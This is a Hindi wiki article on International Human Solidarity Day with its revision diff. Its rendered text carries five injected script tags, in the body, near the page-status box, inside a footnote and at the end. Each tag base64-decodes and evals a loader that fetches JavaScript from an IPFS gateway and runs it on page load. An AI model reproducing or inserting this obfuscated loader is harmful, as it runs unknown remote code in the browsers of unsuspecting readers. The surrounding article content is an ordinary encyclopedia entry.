Difference between revisions of "अंतरराष्ट्रीय मानव एकता दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अंतरराष्ट्रीय मानव एकता दिवस''' (अंग्रेज़ी: ''International Hu...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''अंतरराष्ट्रीय मानव एकता दिवस''' ([[अंग्रेज़ी]]: ''International Human Solidarity Day'') प्रत्येक वर्ष [[20 दिसंबर]] को पूरे विश्व में मनाया जाता है। एकता का संदेश देने के लिए [[संयुक्त राष्ट्र]] ने [[20 दिसंबर]] को अंतरराष्ट्रीय मानव एकता दिवस घोषित किया है। इसका मकसद है लोगों को विविधता में एकता का महत्व बताते हुए जागरूकता फैलाना। दुनिया के विभिन्न देश इस दिन अपनी जनता के बीच शांति, भाईचारा, प्यार, सौहार्द और एकता के संदेश का प्रसार करते हैं। भारतीयों को एकता के सूत्र में बांधने की पहल की है ''हेल्प4ह्यूमेन रिसर्च ऐंड डेवलपमेंट'' ने। यह संस्था हमेशा से देश में शांति, एकता और भाईचारे की भावना के प्रसार के लिए बढ़चढ़ कर हिस्सा लेती रही है।<ref>{{cite web |url=http://aajtak.intoday.in/story/india-celebrates-international-solidarity-day-mega-event-1-750023.html |title=अंतरराष्ट्रीय मानव एकता दिवस|accessmonthday=9 दिसम्बर |accessyear=2014 |last= |first= |authorlink= |format= |publisher=आजतक |language=हिंदी }}</ref>
+
{{सूचना बक्सा संक्षिप्त परिचय
 +
|चित्र=International-Human-Solidery-Day.jpg
 +
|चित्र का नाम=अंतरराष्ट्रीय मानव एकता दिवस
 +
|विवरण='''अंतरराष्ट्रीय मानव एकता दिवस''' प्रत्येक वर्ष [[20 दिसंबर]] को पूरे विश्व में मनाया जाता है।
 +
|शीर्षक 1=शुरुआत
 +
|पाठ 1=[[संयुक्त राष्ट्र]] ने [[22 दिसम्बर]], [[2005]] में
 +
|शीर्षक 2=उद्देश्य
 +
|पाठ 2=लोगों को विविधता में एकता का महत्व बताते हुए जागरूकता फैलाना।
 +
|शीर्षक 3=
 +
|पाठ 3=
 +
|शीर्षक 4=
 +
|पाठ 4=
 +
|शीर्षक 5=
 +
|पाठ 5=
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=
 +
|अन्य जानकारी= ''हेल्प4ह्यूमेन रिसर्च ऐंड डेवलपमेंट'' ने भारतीयों को एकता के सूत्र में बांधने की पहल की है। यह संस्था हमेशा से देश में शांति, एकता और भाईचारे की भावना के प्रसार के लिए बढ़चढ़ कर हिस्सा लेती रही है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''अंतरराष्ट्रीय मानव एकता दिवस''' ([[अंग्रेज़ी]]: ''International Human Solidarity Day'') प्रत्येक वर्ष [[20 दिसंबर]] को पूरे विश्व में मनाया जाता है। एकता का संदेश देने के लिए [[संयुक्त राष्ट्र]] ने [[20 दिसंबर]] को अंतरराष्ट्रीय मानव एकता दिवस घोषित किया है।  
 +
==उद्देश्य==
 +
अंतरराष्ट्रीय मानव एकता दिवस का उद्देश्य है लोगों को विविधता में एकता का महत्व बताते हुए जागरूकता फैलाना। दुनिया के विभिन्न देश इस दिन अपनी जनता के बीच शांति, भाईचारा, प्यार, सौहार्द और एकता के संदेश का प्रसार करते हैं। ''हेल्प4ह्यूमेन रिसर्च ऐंड डेवलपमेंट'' ने भारतीयों को एकता के सूत्र में बांधने की पहल की है। यह संस्था हमेशा से देश में शांति, एकता और भाईचारे की भावना के प्रसार के लिए बढ़चढ़ कर हिस्सा लेती रही है।<ref>{{cite web |url=http://aajtak.intoday.in/story/india-celebrates-international-solidarity-day-mega-event-1-750023.html |title=अंतरराष्ट्रीय मानव एकता दिवस|accessmonthday=9 दिसम्बर |accessyear=2014 |last= |first= |authorlink= |format= |publisher=आजतक |language=हिंदी }}</ref>
  
  

Latest revision as of 12:57, 9 December 2014

aantararashtriy manav ekata divas
vivaran aantararashtriy manav ekata divas pratyek varsh 20 disanbar ko poore vishv mean manaya jata hai.
shuruat sanyukt rashtr ne 22 disambar, 2005 mean
uddeshy logoan ko vividhata mean ekata ka mahatv batate hue jagarookata phailana.
any janakari help4hyoomen risarch aiand devalapameant ne bharatiyoan ko ekata ke sootr mean baandhane ki pahal ki hai. yah sanstha hamesha se desh mean shaanti, ekata aur bhaeechare ki bhavana ke prasar ke lie badhachadh kar hissa leti rahi hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

aantararashtriy manav ekata divas (aangrezi: International Human Solidarity Day) pratyek varsh 20 disanbar ko poore vishv mean manaya jata hai. ekata ka sandesh dene ke lie sanyukt rashtr ne 20 disanbar ko aantararashtriy manav ekata divas ghoshit kiya hai.

uddeshy

aantararashtriy manav ekata divas ka uddeshy hai logoan ko vividhata mean ekata ka mahatv batate hue jagarookata phailana. duniya ke vibhinn desh is din apani janata ke bich shaanti, bhaeechara, pyar, sauhard aur ekata ke sandesh ka prasar karate haian. help4hyoomen risarch aiand devalapameant ne bharatiyoan ko ekata ke sootr mean baandhane ki pahal ki hai. yah sanstha hamesha se desh mean shaanti, ekata aur bhaeechare ki bhavana ke prasar ke lie badhachadh kar hissa leti rahi hai.[1]



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. aantararashtriy manav ekata divas (hiandi) ajatak. abhigaman tithi: 9 disambar, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>